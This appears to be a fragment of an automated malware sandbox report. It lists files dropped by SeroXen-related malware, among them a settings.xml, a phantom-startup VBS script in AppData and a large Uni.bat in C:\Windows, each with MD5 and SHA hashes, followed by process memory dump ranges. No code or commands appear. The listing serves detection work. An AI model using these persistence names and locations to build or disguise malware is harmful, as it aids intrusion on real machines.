MD544ee2a9fe1c7040a897c305ea8b3595c
SHA17f126b3f279bc09ce139e0a7c59b3ca2bbc373e6
SHA25644f9a8d84dd2a8d8271af62bcd4c330d4cfa741f9461dd612573c4f4bb410598
SHA512a3bde2c4786213e4ec7d6d5140309ef8c2d7297b4690b4d535cc537156e7af5a4b08e6a477cefa89ee20ba0de7c5439938c09a90baca4d5147aad785343dae8f
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\settings.xmlFilesize
688B
MD55769c0618b9fe4873c9256b5cbbf2b95
SHA1e123705e308feb804baf0f23949f966e78162dd5
SHA256a5828dc580978f8e1f37459d33e8158416b6c8a0c2881e9eabced034ecfbd15c
SHA51215f80ce7cb33125c856dd7b6ed032dedc0ea30c40eb72d44e0c4f7cecefe33e54449c51f70efe88154dc35f52bdaa78b6fa6079cc55425aefcd7088d3f25acae
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tnneyrqv.tnu.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_215.vbsFilesize
124B
MD5a0822380401028afa7f1003de4dc96af
SHA12ca868dfe8a2ebff45e25a9e55319b7358826b61
SHA256ed4256f0b5b7f6a5dc4dfc26b98980cf95dbc8c8c45c72e1d7a9aa82a885d6eb
SHA5122ab21139283d6508f68abb3543a15dced41bb4bd2cbb2f640ac63bdfe7112613ece544c9ef26a27db2cc9da3db3aba036c243e4840b5dc72aabc4279d229a10c
-
C:\Windows\Uni.batFilesize
586KB
MD53a43120a8dd1e42ff894670710bd8bc4
SHA1dbb9244231da204517f5d7a0e5ca713b64a3c175
SHA256b3db27588a80527cb09b85476ed59ce698dc9a4b6b03246160de944ecc5ca79d
SHA51215931135fd1fec93a3d77e0f28a19ca0780e7de34ab6a4f8174999cf534b4f810ace2bba0db3f2d0d0007199771b16d0c2bc3cdee48ef00a19be4705d3c26026
-
\??\pipe\crashpad_4008_UCWYGPXWIWPBMWPVMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/908-627-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/960-595-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1088-626-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1112-608-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1132-605-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1140-544-0x0000025F6E3F0000-0x0000025F6E466000-memory.dmpFilesize
472KB
-
memory/1140-545-0x0000025F6DF60000-0x0000025F6DF68000-memory.dmpFilesize
32KB
-
memory/1140-546-0x0000025F6E370000-0x0000025F6E3E0000-memory.dmpFilesize
448KB
-
memory/1140-543-0x0000025F6DF80000-0x0000025F6DFC4000-memory.dmpFilesize
272KB
-
memory/1324-588-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1344-589-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1564-591-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1572-590-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1676-629-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1704-610-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1732-606-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1772-587-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1880-628-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1888-634-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/1984-679-0x000001B5C7B80000-0x000001B5C7BBC000-memory.dmpFilesize
240KB
-
memory/1984-678-0x000001B5C7B20000-0x000001B5C7B32000-memory.dmpFilesize
72KB
-
memory/1984-623-0x000001B5C7340000-0x000001B5C739E000-memory.dmpFilesize
376KB
-
memory/2064-612-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/2124-607-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/2148-593-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/2264-635-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/2496-611-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/2504-609-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/2740-594-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/2852-637-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/2860-624-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/2880-621-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/3292-592-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/3456-636-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/3524-575-0x0000000008F10000-0x0000000008F3A000-memory.dmpFilesize
168KB
-
memory/3524-577-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/3656-625-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/3924-596-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/4124-503-0x000001D8E8780000-0x000001D8E87D8000-memory.dmpFilesize
352KB
-
memory/4124-504-0x000001D8EA400000-0x000001D8EA43C000-memory.dmpFilesize
240KB
-
memory/4124-506-0x000001D8EAD90000-0x000001D8EADCE000-memory.dmpFilesize
248KB
-
memory/4136-622-0x00007FFE650D0000-0x00007FFE650E0000-memory.dmpFilesize
64KB
-
memory/5272-684-0x0000016126060000-0x00000161260C4000-memory.dmpFilesize
400KB
-
memory/5272-686-0x0000016140B20000-0x0000016140EE2000-memory.dmpFilesize
3.8MB
-
memory/5348-507-0x00000260C6E90000-0x00000260C6EB2000-memory.dmpFilesize
136KB
-
memory/5840-486-0x0000000000620000-0x000000000070E000-memory.dmpFilesize
952KB